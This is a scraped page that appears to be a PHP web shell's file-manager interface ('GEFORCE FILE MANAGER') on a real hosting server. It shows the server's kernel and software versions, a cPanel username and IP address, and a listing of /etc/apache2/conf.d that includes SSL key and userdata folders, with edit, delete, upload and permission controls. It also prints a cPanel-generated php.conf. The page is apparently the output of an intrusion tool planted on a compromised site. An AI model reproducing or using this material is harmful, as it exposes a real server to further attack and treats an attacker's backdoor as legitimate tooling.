[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
etc
/
apache2
/
conf.d
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 includes
SET
[ DEL ]
📁 modsec
SET
[ DEL ]
📁 ssl.crt
SET
[ DEL ]
📁 ssl.key
SET
[ DEL ]
📁 userdata
SET
[ DEL ]
📄 README
366 B
SET
[ EDIT ]
|
[ DEL ]
📄 autoindex.conf
3,273 B
SET
[ EDIT ]
|
[ DEL ]
📄 cgid.conf
75 B
SET
[ EDIT ]
|
[ DEL ]
📄 cperror.conf
502 B
SET
[ EDIT ]
|
[ DEL ]
📄 http2.conf
90 B
SET
[ EDIT ]
|
[ DEL ]
📄 mailman.conf
488 B
SET
[ EDIT ]
|
[ DEL ]
📄 modsec2.conf
1,617 B
SET
[ EDIT ]
|
[ DEL ]
📄 php.conf
1,672 B
SET
[ EDIT ]
|
[ DEL ]
📄 php_add_handler_fix.conf
236 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: php.conf
# This file was automatically generated by the Cpanel php # Configuration system. If you wish to change the way php is being # handled by Apache on your system, use the # /usr/local/cpanel/bin/rebuild_phpconf script or the WHM interface. # # Manual edits of this file will be lost when the configuration is # rebuilt. # These initial handlers serve as fallback in case there is any # time between when configuration has changed and when it takes effect. # We use CGI style since it is simple and the default we use elsewhere. # If the version is not set to CGI they will get a 404 until the new # configuration takes effect which is better than serving source # code until the new configuration takes effect. <IfModule actions_module> Action application/x-httpd-ea-php72 /cgi-sys/ea-php72 Action application/x-httpd-ea-php80 /cgi-sys/ea-php80 Action application/x-httpd-ea-php81 /cgi-sys/ea-php81 Action application/x-httpd-ea-php84 /cgi-sys/ea-php84 </IfModule> # CGI configuration for ea-php72 <IfModule actions_module> Action application/x-httpd-ea-php72 /cgi-sys/ea-php72 </IfModule> # CGI configuration for ea-php80 <IfModule actions_module> Action application/x-httpd-ea-php80 /cgi-sys/ea-php80 </IfModule> # CGI configuration for ea-php84 <IfModule actions_module> Action application/x-httpd-ea-php84 /cgi-sys/ea-php84 </IfModule> # Set ea-php81 as the system default for php <IfModule mime_module> AddHandler application/x-httpd-ea-php81 .php .php8 .phtml </IfModule> # CGI configuration for ea-php81 <IfModule actions_module> Action application/x-httpd-ea-php81 /cgi-sys/ea-php81 </IfModule> # End of autogenerated php configuration.